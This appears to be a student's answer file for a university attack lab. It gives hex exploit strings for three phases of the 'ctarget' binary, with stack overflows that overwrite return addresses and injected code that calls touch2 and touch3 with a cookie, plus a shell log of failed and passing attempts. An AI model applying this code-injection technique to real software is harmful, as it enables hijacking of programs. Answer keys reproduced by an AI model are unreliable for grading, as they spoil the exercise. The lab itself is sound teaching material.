
/* Answer for phase3 
48 c7 c7 b0 80 67 55 c3
00 00 00 00 00 00 00 00
30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 00
30 30 30 30 30 30 30 00
68 80 67 55 00 00 00 00
fd 17 40 00 00 00 00 00
34 65 30 36 61 37 30 37
*/

/* Answer for phase2 
48 c7 c7 07 a7 06 4e c3
00 00 00 00 00 00 00 00
30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 00
30 30 30 30 30 30 30 00
68 80 67 55 00 00 00 00
29 17 40 00 00 00 00 00
 */

/* Answer for phase1 
30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 00
30 30 30 30 30 30 30 00
fd 16 40 00 00 00 00 */

/* Etc
bash-4.2$ cat ctaget104.txt | ./hex2raw | ./ctarget
cat: ctaget104.txt: No such file or directory
Cookie: 0x4e06a707
Type string:No exploit.  Getbuf returned 0x1
Normal return
bash-4.2$ cat ctarget104.txt | ./hex2raw | ./ctarget
Cookie: 0x4e06a707
Type string:Misfire: You called touch2(0x4006a707)
FAILED
bash-4.2$ gcc -c phase2.s
bash-4.2$ objdump -d phase2.o

phase2.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <.text>:
   0:   48 c7 c7 07 a7 06 40    mov    $0x4006a707,%rdi
   7:   68 29 17 40 00          pushq  $0x401729
   c:   c3                      retq   
bash-4.2$ cat ctarget104.txt | ./hex2raw | ./ctarget
Cookie: 0x4e06a707
Type string:Misfire: You called touch2(0x4006a707)
FAILED
bash-4.2$ cat ctarget104.txt | ./hex2raw | ./ctarget
Cookie: 0x4e06a707
Type string:Touch2!: You called touch2(0x4e06a707)
Valid solution for level 2 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
bash-4.2$ */